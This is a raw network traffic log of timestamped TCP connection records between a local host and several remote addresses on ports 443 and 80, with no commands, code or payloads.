                                                                                                                                                                          Nov 23, 2024 19:01:48.244992971 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.245095015 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.245784044 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.245820045 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.360167027 CET4434976313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.360256910 CET4434976313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.360511065 CET49763443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.363346100 CET49763443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.363346100 CET49763443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.363369942 CET4434976313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.363379955 CET4434976313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.364527941 CET4434975913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.364710093 CET4434975913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.364806890 CET49759443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.365772963 CET49759443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.365786076 CET4434975913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.365796089 CET49759443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.365802050 CET4434975913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369129896 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369193077 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369254112 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369287968 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369323969 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369412899 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369447947 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369463921 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369499922 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369523048 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369534016 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369556904 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.369606972 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369905949 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.369935989 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.370203018 CET4434976213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.370352030 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.370352983 CET4434976213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.370362043 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.370434999 CET49762443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.370517969 CET49762443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.370529890 CET4434976213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.370562077 CET49762443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.370572090 CET4434976213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.371835947 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.371854067 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.371903896 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.372076035 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.372087955 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.372560978 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.372582912 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:48.372745991 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.372859001 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:48.372870922 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.227349997 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.238892078 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.238974094 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.239603043 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.239618063 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.288225889 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.330574036 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.349855900 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.349870920 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.349873066 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.350624084 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.351535082 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.353877068 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.353884935 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.354321957 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.354352951 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.354971886 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.354979038 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.390916109 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.391012907 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.400576115 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.400590897 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.401087999 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.401093006 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.401592016 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.401597977 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.402103901 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.402107954 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.691092014 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.691183090 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.691296101 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.696316957 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.696317911 CET49768443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.696386099 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.696410894 CET4434976813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.700613022 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.700655937 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.700736046 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.700936079 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.700948954 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.736242056 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.736306906 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.736465931 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.736576080 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.736593962 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.736612082 CET49774443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.736617088 CET4434977413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.740298986 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.740319967 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.740438938 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.740619898 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.740628004 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.808160067 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.808244944 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.808301926 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.808773994 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.808830023 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.808864117 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.808882952 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.810065985 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.810144901 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.810590982 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.810776949 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.810794115 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.810807943 CET49773443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.810813904 CET4434977313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.812926054 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.812948942 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.813335896 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.813638926 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.813652992 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.813730001 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.813769102 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.813843966 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.813998938 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.814008951 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.937469959 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.937541008 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.937606096 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.937783957 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.937794924 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.937804937 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.937809944 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.941051006 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.941102028 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:50.941190004 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.941345930 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:50.941361904 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.460685015 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:52.460743904 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.460855961 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:52.461838007 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:52.461853981 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.487497091 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.518047094 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.518094063 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.518788099 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.518802881 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.601664066 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.608624935 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.608659983 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.609658003 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.609663010 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.614651918 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.615015984 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.615031958 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.615390062 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.615395069 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.671705008 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.685293913 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.685337067 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.685879946 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.685884953 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.781774044 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.788348913 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.788366079 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:52.789273024 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:52.789278984 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.049050093 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.049212933 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.049237013 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.049282074 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.049474001 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.049536943 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.052170038 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.052194118 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.052206039 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.052212000 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.052249908 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.052280903 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.052294016 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.052299976 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.055821896 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.055855989 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.055902958 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.055917025 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.055969000 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.056015968 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.056210995 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.056226015 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.056231976 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.056261063 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.058372974 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.058537006 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.058588982 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.058638096 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.058645964 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.058667898 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.058672905 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.060929060 CET49790443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.060954094 CET4434979013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.061611891 CET49790443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.061846018 CET49790443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.061873913 CET4434979013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.101392984 CET49792443192.168.2.52.23.161.164
                                                                                                                                                                          Nov 23, 2024 19:01:53.101475954 CET443497922.23.161.164192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.101632118 CET49792443192.168.2.52.23.161.164
                                                                                                                                                                          Nov 23, 2024 19:01:53.102859974 CET49792443192.168.2.52.23.161.164
                                                                                                                                                                          Nov 23, 2024 19:01:53.102885962 CET443497922.23.161.164192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.154732943 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.154803038 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.154894114 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.155298948 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.155330896 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.155345917 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.155353069 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.158754110 CET49793443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.158809900 CET4434979313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.158871889 CET49793443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.159444094 CET49793443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.159462929 CET4434979313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.230865955 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.230925083 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.230973959 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.231319904 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.231319904 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.231333971 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.231344938 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.234774113 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.234801054 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:53.234849930 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.235176086 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:53.235186100 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.303581953 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.304080009 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:54.304105997 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.305502892 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.305581093 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:54.307815075 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:54.307879925 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.342159986 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:54.362610102 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:54.362634897 CET44349786142.250.181.100192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.408957958 CET49786443192.168.2.5142.250.181.100
                                                                                                                                                                          Nov 23, 2024 19:01:54.571348906 CET443497922.23.161.164192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.571938038 CET49792443192.168.2.52.23.161.164
                                                                                                                                                                          Nov 23, 2024 19:01:54.574955940 CET49792443192.168.2.52.23.161.164
                                                                                                                                                                          Nov 23, 2024 19:01:54.574965000 CET443497922.23.161.164192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.575282097 CET443497922.23.161.164192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.613173962 CET49792443192.168.2.52.23.161.164
                                                                                                                                                                          Nov 23, 2024 19:01:54.655338049 CET443497922.23.161.164192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.808758974 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.808855057 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.808934927 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.809453964 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.809484959 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.891868114 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:54.891958952 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:54.892337084 CET49797443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:54.892388105 CET4434979723.1.237.91192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.892467022 CET49797443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:54.892842054 CET4434979013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.893802881 CET49790443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.893855095 CET4434979013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.894795895 CET49790443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.894807100 CET4434979013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.895016909 CET49797443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:54.895029068 CET4434979723.1.237.91192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.895695925 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.896132946 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.896163940 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.896531105 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.896541119 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.982937098 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.985621929 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.985662937 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:54.986327887 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:54.986337900 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.026876926 CET4434979313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.027573109 CET49793443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:55.027602911 CET4434979313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.028028011 CET49793443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:55.028033972 CET4434979313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.061913013 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.066606045 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.066627026 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.120690107 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:55.120711088 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.121295929 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:55.121301889 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.195940018 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:55.196036100 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:55.196254015 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:55.196496010 CET49800443192.168.2.513.107.246.63
